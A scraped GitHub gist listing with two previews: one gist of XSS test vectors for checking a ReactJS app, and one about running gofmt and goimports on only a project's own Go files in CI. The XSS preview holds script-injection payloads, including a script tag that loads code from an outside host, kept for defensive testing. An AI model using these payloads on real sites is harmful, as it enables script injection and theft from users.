Skip to content

Instantly share code, notes, and snippets.

View csaden's full-sized avatar

Chris Saden csaden

381 followers · 0 following
View GitHub Profile
@scabbiaza
scabbiaza / List of vectors for checking on XSS
Last active December 29, 2023 07:44
ReactJS - prevent XSS vulnerability
// Theory
// http://htmlpurifier.org/live/smoketests/xssAttacks.php
// https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
// A full collection of HTML5 related XSS attack vectors:
// https://github.com/cure53/H5SC https://raw.githubusercontent.com/cure53/H5SC/master/vectors.txt
// Short list
<script>alert("XSS: script tag")</script>
<script src="http://hackers-site.powertofly.com"></script>
@bgentry
bgentry / gist:fd1ffef7dbde01857f66
Last active March 25, 2020 17:56
Using gofmt or goimports on only my own Go files (excluding vendored deps)

In Travis CI, I want to check that my Go files are formatted properly via gofmt and goimports. During my CI builds, I only care about formatting issues in my own code, not in third-party repos.

Unfortunately, running a simple gofmt -l . in the root of my project does not work because I'm using Godep, which checks in all of my external dependencies at ./Godep/_workspace. While running go fmt ./... ignores underscore-prefixed subdirectories, the plain gofmt . does not. Neither gofmt nor goimports take the ./... arg:

➜  goimports -l ./...      
stat ./...: no such file or directory

Since I can use go list ./... to get a list of all subpackages in my project (exluding vendored imports in an underscore-prefixed directory), I'm using the following to run gofmt and goimports on each of my own Go files (including _test.go files):